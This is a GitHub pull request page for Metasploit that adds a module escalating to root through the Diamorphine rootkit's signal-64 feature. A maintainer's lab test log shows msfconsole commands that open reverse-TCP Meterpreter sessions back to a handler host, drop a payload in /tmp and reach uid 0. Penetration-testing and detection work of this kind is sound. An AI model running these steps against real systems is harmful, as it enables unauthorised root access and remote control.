Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Add Diamorphine Rootkit Signal Privilege Escalation module #12942

Merged
merged 1 commit into from Feb 19, 2020
Merged

Add Diamorphine Rootkit Signal Privilege Escalation module #12942

merged 1 commit into from Feb 19, 2020

Conversation

bcoles
Copy link
Contributor

@bcoles bcoles commented Feb 16, 2020
edited

Add Diamorphine Rootkit Signal Privilege Escalation module.

    This module uses Diamorphine rootkit's privesc feature using signal
    64 to elevate the privileges of arbitrary processes to UID 0 (root).

    This module has been tested successfully with Diamorphine from `master`
    branch (2019-10-04) on Linux Mint 19 kernel 4.15.0-20-generic (x64).

This implementation is not particularly stealthy. It drops a payload to disk, and doesn't take advantage of any of Diamorphine's features, beyond simply leveraging the privesc signal to elevate privileges.

The value of this module is largely derived from the check method. If the rootkit has been configured to handle the default signal (64), then this module can also be leveraged by post/multi/recon/local_exploit_suggester to scan a host for Diamorphine while performing other privesc checks.

@bcoles bcoles mentioned this pull request Feb 16, 2020
Merged
@space-r7 space-r7 self-assigned this Feb 19, 2020
space-r7 added a commit that referenced this pull request Feb 19, 2020
@space-r7
Land #12942, add Diamorphine privilege escalation
db8555e
@space-r7 space-r7 merged commit ac6d0e4 into rapid7:master Feb 19, 2020
@space-r7
Copy link
Contributor

Tested on Ubuntu 16.04 with latest version of Diamorphine:

msf5 > use multi/handler
msf5 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 192.168.37.1
lhost => 192.168.37.1
msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.37.1:4444 
[*] Sending stage (3021284 bytes) to 192.168.37.132
[*] Meterpreter session 1 opened (192.168.37.1:4444 -> 192.168.37.132:58874) at 2020-02-19 10:15:00 -0600

meterpreter > getuid
Server username: uid=1000, gid=1000, euid=1000, egid=1000
meterpreter > sysinfo
Computer     : 192.168.37.132
OS           : Ubuntu 16.04 (Linux 4.15.0-45-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > background
[*] Backgrounding session 1...
msf5 exploit(multi/handler) > use exploit/linux/local/diamorphine_rootkit_signal_priv_esc 
msf5 exploit(linux/local/diamorphine_rootkit_signal_priv_esc) > set session 1
session => 1
msf5 exploit(linux/local/diamorphine_rootkit_signal_priv_esc) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
msf5 exploit(linux/local/diamorphine_rootkit_signal_priv_esc) > set lhost 192.168.37.1
lhost => 192.168.37.1
msf5 exploit(linux/local/diamorphine_rootkit_signal_priv_esc) > check
[+] The target is vulnerable. Diamorphine is installed and configured to handle signal '64'.
msf5 exploit(linux/local/diamorphine_rootkit_signal_priv_esc) > run

[*] Started reverse TCP handler on 192.168.37.1:4444 
[*] Writing '/tmp/.EynpqzLyrx' (250 bytes) ...
[*] Sending stage (3021284 bytes) to 192.168.37.132
[*] Meterpreter session 2 opened (192.168.37.1:4444 -> 192.168.37.132:58876) at 2020-02-19 10:18:45 -0600
[+] Deleted /tmp/.EynpqzLyrx

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer     : 192.168.37.132
OS           : Ubuntu 16.04 (Linux 4.15.0-45-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux

@space-r7
Copy link
Contributor

space-r7 commented Feb 19, 2020
edited by tperry-r7

Release Notes

This adds a local exploit module that gains root privileges on systems with the Diamorphine rootkit. The module leverages the elevate signal, typically signal 64, to elevate privileges to root.

@bcoles bcoles deleted the diamorphine_rootkit_signal_priv_esc branch February 20, 2020 00:53
@tperry-r7 tperry-r7 added the rn-modules release notes for new or majorly enhanced modules label Feb 20, 2020
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers
No reviews
Assignees

@space-r7 space-r7

Labels
docs module rn-modules release notes for new or majorly enhanced modules
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

None yet
3 participants
@bcoles @space-r7 @tperry-r7